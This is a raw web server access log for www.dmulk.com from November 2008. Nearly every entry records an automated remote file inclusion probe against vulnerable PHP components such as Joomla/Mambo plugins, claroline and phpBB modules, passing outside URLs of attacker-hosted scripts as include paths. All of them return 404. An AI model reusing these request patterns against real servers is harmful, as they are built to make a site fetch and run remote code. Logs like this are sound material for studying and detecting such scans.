87.106.243.160 - - [04/Nov/2008:09:14:38 -0800] "GET /logs/access_080917.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:39 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:14:44 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:14:44 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:14:44 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:44 -0800] "GET /logs/access_080510.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:46 -0800] "GET /logs/access_080510.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:46 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:46 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:15:10 -0800] "GET /logs/access_080917.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:15:56 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
154.5.252.194 - - [04/Nov/2008:09:16:22 -0800] "GET /logs/access_080307.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
154.5.252.194 - - [04/Nov/2008:09:16:22 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
154.5.252.194 - - [04/Nov/2008:09:16:23 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.67.0.44 - - [04/Nov/2008:09:16:45 -0800] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:51 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:51 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:51 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:51 -0800] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:52 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:52 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:52 -0800] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:17:52 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:19:04 -0800] "GET /logs/includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:19:04 -0800] "GET /includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:19:22 -0800] "GET /logs/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:19:22 -0800] "GET /modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:19:22 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:19:22 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:19:35 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:19:35 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:20:51 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:20:51 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:20:53 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:20:53 -0800] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:21:25 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:21:25 -0800] "GET /logs/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:21:25 -0800] "GET /modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:09:21:27 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.197.217.53 - - [04/Nov/2008:09:21:29 -0800] "GET /logs/access_080925.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.40 - - [04/Nov/2008:09:21:43 -0800] "GET /blog/?show=gallery&pageid=172&nggpage=17 HTTP/1.1" 200 160024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:22:00 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:22:23 -0800] "GET /logs/includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:22:23 -0800] "GET /includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:22:45 -0800] "GET /errors.php?error=http://lottus.50webs.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:22:45 -0800] "GET /logs/access_080828.log/errors.php?error=http://lottus.50webs.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:22:49 -0800] "GET /logs/errors.php?error=http://lottus.50webs.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:22:58 -0800] "GET /logs/access_080410.log/phptpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:22:58 -0800] "GET /phptpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:22:59 -0800] "GET /logs/phptpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.22 - - [04/Nov/2008:09:23:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.22 - - [04/Nov/2008:09:23:05 -0800] "GET /logs/access_080723.log HTTP/1.1" 200 1703936 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.22 - - [04/Nov/2008:09:23:22 -0800] "GET /logs/access_080719.log HTTP/1.1" 200 1900544 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:23:32 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:23:33 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:01 -0800] "GET /modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:01 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:01 -0800] "GET /logs/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:09:24:07 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:09:24:07 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:12 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:12 -0800] "GET /logs/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:13 -0800] "GET /modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:24:25 -0800] "GET /logs/access_081002.log/errors.php?error=http://lottus.50webs.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:28 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.73.133.74 - - [04/Nov/2008:09:24:29 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://passion-voyage.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:24:35 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:24:35 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:24:44 -0800] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:24:45 -0800] "GET /errors.php?error=http://gosgo.com/bbs/idfeel.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:24:45 -0800] "GET /logs/access_080828.log/errors.php?error=http://gosgo.com/bbs/idfeel.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:24:45 -0800] "GET /logs/errors.php?error=http://gosgo.com/bbs/idfeel.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
201.30.20.130 - - [04/Nov/2008:09:24:50 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:24:50 -0800] "GET /logs/includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:24:50 -0800] "GET /includes/lang/language.php?path_to_root=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:09:25:02 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:09:25:02 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:10 -0800] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:09:25:20 -0800] "GET /include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:09:25:20 -0800] "GET /logs//include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:09:25:22 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:09:25:27 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:09:25:27 -0800] "GET /logs/access_080504.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:42 -0800] "GET /logs/access_080523.log/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:42 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:42 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:25:43 -0800] "GET /logs/access_081002.log/errors.php?error=http://gosgo.com/bbs/idfeel.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:45 -0800] "GET /logs/access_080523.log/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:45 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:45 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:45 -0800] "GET /logs/access_080523.log/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:46 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:25:46 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:25:53 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:25:54 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:26:20 -0800] "GET /logs/access_080123.log/phptpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.142.148.142 - - [04/Nov/2008:09:26:42 -0800] "GET /logs/access_080927.log//components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:26:46 -0800] "GET /logs/access_080111.log//convert/mvcw_conver.php?step=1&vwar_root=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:26:46 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:26:47 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:26:52 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:26:53 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
